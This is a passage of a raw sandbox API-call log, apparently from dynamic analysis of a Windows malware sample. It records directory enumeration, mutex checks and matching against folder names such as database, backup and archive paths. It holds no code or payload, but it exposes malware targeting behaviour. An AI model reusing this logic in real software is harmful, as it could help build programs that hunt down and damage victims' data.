lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.330] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0109.330] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.330] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.330] GlobalLock (hMem=0x450004) returned 0x591988 [0109.330] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.330] GlobalUnlock (hMem=0x450004) returned 0 [0109.330] GlobalLock (hMem=0x450004) returned 0x591988 [0109.330] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.333] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.333] GlobalUnlock (hMem=0x450004) returned 0 [0109.333] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.333] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) 
returned 1 [0109.333] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.333] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.333] GlobalLock (hMem=0x450004) returned 0x593998 [0109.333] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.333] GlobalUnlock (hMem=0x45000c) returned 0 [0109.333] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.333] GlobalUnlock (hMem=0x450004) returned 0 [0109.334] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.334] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0109.334] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.334] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.334] GlobalLock (hMem=0x450004) returned 0x591988 [0109.334] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.334] GlobalUnlock (hMem=0x450004) returned 0 [0109.334] GlobalLock (hMem=0x450004) returned 0x591988 [0109.334] GlobalLock (hMem=0x45000c) returned 
0x593998 [0109.334] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.334] GlobalUnlock (hMem=0x450004) returned 0 [0109.334] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.334] GlobalUnlock (hMem=0x45000c) returned 0 [0109.334] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.334] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0109.334] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.334] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.334] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.334] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.334] GlobalUnlock (hMem=0x45000c) returned 0 [0109.334] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.335] GlobalLock (hMem=0x450004) returned 0x593998 [0109.335] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.335] GlobalUnlock (hMem=0x45000c) returned 0 [0109.335] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.335] GlobalUnlock (hMem=0x450004) returned 0 [0109.335] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.335] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, 
ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0109.335] GetLastError () returned 0x12 [0109.335] FindClose (in: hFindFile=0x58b020 | out: hFindFile=0x58b020) returned 1 [0109.335] FindNextFileW (in: hFindFile=0x587720, lpFindFileData=0x18f1e4 | out: lpFindFileData=0x18f1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0109.335] FileTimeToLocalFileTime (in: lpFileTime=0x18f1f8, lpLocalFileTime=0x18f104 | out: lpLocalFileTime=0x18f104) returned 1 [0109.335] FileTimeToDosDateTime (in: lpFileTime=0x18f104, lpFatDate=0x18f1c6, lpFatTime=0x18f1c4 | out: lpFatDate=0x18f1c6, lpFatTime=0x18f1c4) returned 1 [0109.335] GlobalLock (hMem=0x450004) returned 0x591988 [0109.335] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.335] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.336] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.336] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.336] GlobalUnlock (hMem=0x45000c) returned 0 [0109.336] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.336] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.336] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.336] GlobalUnlock 
(hMem=0x45000c) returned 0 [0109.336] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.336] GlobalLock (hMem=0x450004) returned 0x593998 [0109.336] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.336] GlobalUnlock (hMem=0x45000c) returned 0 [0109.336] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.336] SysReAllocStringLen (in: pbstr=0x18f104*=0x0, psz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", len=0x36 | out: pbstr=0x18f104*="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 1 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.336] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.336] GlobalUnlock (hMem=0x450004) returned 0 [0109.336] GlobalLock (hMem=0x450004) returned 0x591988 [0109.337] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.337] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.337] GlobalUnlock (hMem=0x450004) returned 0 [0109.337] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.337] GlobalUnlock (hMem=0x45000c) returned 0 [0109.337] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft\\Exchange Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="䱈@鼦W黺W企@\x18㼔V\x18\x1b")) returned 0xffffffff [0109.377] GetLastError () returned 0x3 [0109.377] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", 
cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.377] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=26, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0109.380] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=21, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\ct Edition\\ition\\") returned 21 [0109.380] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft SQL Server", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@麌W企@\x18㽜V\x181")) returned 0xffffffff [0109.382] GetLastError () returned 0x2 [0109.382] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.382] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d360, cbMultiByte=21, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0109.382] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=9, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\ct Edition\\ition\\") returned 9 [0109.382] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Firebird", 
lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@V企@\x18㪔X\x18;")) returned 0xffffffff [0109.384] GetLastError () returned 0x2 [0109.384] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0109.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=8, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\ct Edition\\ition\\") returned 8 [0109.384] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MSSQL.1", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㧴X\x18D")) returned 0xffffffff [0109.386] GetLastError () returned 0x2 [0109.386] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft 
shared\\grphflt\\") returned 0x37 [0109.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0109.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=37, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\ition\\") returned 37 [0109.386] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@麌W企@\x18V\x18j")) returned 0xffffffff [0109.387] GetLastError () returned 0x2 [0109.388] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.388] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=37, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\ition\\") returned 37 [0109.388] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\ition\\") returned 6 [0109.388] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Adobe", lpFindFileData=0x18eb80 | out: 
lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㪔X\x18q")) returned 0xffffffff [0109.389] GetLastError () returned 0x2 [0109.389] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.389] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="adobe\\V\x90") returned 6 [0109.390] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\ition\\") returned 7 [0109.390] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Oracle", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@仔W企@\x18㧴X\x18y")) returned 0xffffffff [0109.391] GetLastError () returned 0x2 [0109.391] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 
0x37 [0109.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0109.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\ition\\") returned 7 [0109.392] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Archive", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@倴W企@\x18㪔X\x18\x81")) returned 0xffffffff [0109.395] GetLastError () returned 0x2 [0109.395] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0109.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\ition\\") returned 6 [0109.396] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Backup", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, 
ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@鳜W企@\x18㧴X\x18\x88")) returned 0xffffffff [0109.397] GetLastError () returned 0x2 [0109.397] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.397] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="backup㪐X ") returned 6 [0109.397] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=6, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\ition\\") returned 6 [0109.397] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Reserv", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@仔W企@\x18㪔X\x18\x8f")) returned 0xffffffff [0109.399] GetLastError () returned 0x2 [0109.399] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=6, lpWideCharStr=0x18dd84, 
cchWideChar=2047 | out: lpWideCharStr="reserv㧰X ") returned 6 [0109.399] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18ddcc, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\ition\\") returned 7 [0109.399] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Restore", lpFindFileData=0x18eb80 | out: lpFindFileData=0x18eb80*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="㎌W䱠@倴W企@\x18㧴X\x18\x97")) returned 0xffffffff [0109.401] GetLastError () returned 0x2 [0109.401] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.401] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=7, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.401] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.401] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.401] GlobalUnlock (hMem=0x45000c) returned 0 [0109.401] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.402] GlobalLock (hMem=0x450004) returned 0x593998 [0109.402] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.402] GlobalUnlock (hMem=0x45000c) returned 0 [0109.402] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.402] GlobalUnlock (hMem=0x450004) returned 0 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common 
files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0109.402] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.402] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 